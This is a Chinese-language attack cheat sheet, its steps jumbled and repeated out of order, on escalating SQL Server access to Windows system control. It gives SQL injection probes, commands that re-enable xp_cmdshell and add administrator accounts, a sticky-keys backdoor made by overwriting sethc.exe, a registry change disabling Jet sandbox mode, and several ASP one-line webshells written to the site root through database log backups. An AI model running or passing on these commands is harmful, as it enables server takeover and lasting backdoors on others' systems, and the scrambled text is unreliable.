一.更改sa口令方法,3、备份当前库到d

3、备份当前库到d,cmd1′ with init–,想进一步得到system权限的方法总结,得到SQLserver的权限

手工实现差异备份的步骤

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

3、备份当前库到d:cmd1;backup log 当前库 to disk = ‘d:cmd1’ with init–

利用xp_dirtree列目录
exec master..xp_dirtree ‘c:\’,1,1
查看启动项
exec master..xp_dirtree ‘C:\Documents and
Settings\Administrator\「开始」菜单\程序\启动’,1,1
列数据库
SELECT DB_NAME()

1、恢复当前库’;alter database 当前库 set recovery full–

然后按F5键命令执行完毕

字符型:

方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

1、判断是否有注入;and 1=1 ;and 1=2 ;and user_name()=’dbo’
判断当前系统的连接用户是不是sa

在入侵过程中,得到SQLserver的权限,想进一步得到system权限的方法总结

5、备份一句话代码到站点根目录’;backup log 当前库 to disk =
‘d:www_weboct.asp’–

二.简单修补sa弱口令.

sa权限创建管理员用户

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net
localgroup administrators 新用户 /add’

3、备份当前库到d:cmd1′;backup log 当前库 to disk = ‘d:cmd1’ with init–

1.未能找到存储过程’master..xpcmdshell’.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname
=’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

4、插入一句话代码到创建的表cmd’;insert into cmd (a) values
(‘%%25**ecute(request(a))%%25’)–

最后,等着administrator重新登陆或者重启就OK了!

数字型

note:bat文件是shift脚本就是shift后门,用HEX转的16进制,可修改替换.

4、插入一句话代码到创建的表cmd;insert into cmd (a) values
(‘%%25**ecute(request(a))%%25’)–

代码:
declare @o int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’
,’c:\windows\system32\sethc.exe’;

6、完成;drop table 创建的表–

******************** sa无xp_cmdshell下的提权
***********************

1、恢复当前库;alter database 当前库 set recovery full–

************************************
利用SQL沙盒模式
********************************
note:什么是沙盒模式?
沙盒模式是数据库的一种安全功能.在沙盒模式下,只对控件和字段属性中的安全且不含恶意代码的表达式求值.如果表达式不使用可能以某种方式损坏数据的函数或属性,则可认为它是安全的.

2、建表cmd;create table cmd (a image)–

***********************
一句话表达式为,容错改Execute为Eval *************
<%%25Excute(request(“sb”))%%25>
<%Excute(request(“sb”))%>
%><%execute request(“sb”)%><%
<script language=VBScript runat=server>execute
request(“sb”)</script>
<%25Execute(request(“sb”))%25>

2、添加系统的管理员;exec master.dbo.xp_cmdshell ‘net user wk
wk90/add’;– ;exec master.dbo.xp_cmdshell ‘net localgroup
administrators wk /add’;–

五.SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开
开启xp_cmdshell:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure’xp_cmdshell’, 1;RECONFIGURE;
关闭xp_cmdshell:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure’xp_cmdshell’, 0;RECONFIGURE;

5、备份一句话代码到站点根目录;backup log 当前库 to disk =
‘d:www_weboct.asp教程’–

三.恢复xp_cmdshell
简单恢复xp_cmdshell
;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’–

6、完成’;drop table 创建的表–

搞定 ^_^ !

2、创建表cmd’;create table cmd (a image)–

******************************
超必杀:利用db_owner
*************************
先测试xp_cmdshell是否可用
exec master..xp_cmdshell ‘ver’
提示权限拒绝,db_owner权限.

首先开启沙盒模式:
exec master..xp_regwrite
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,0;–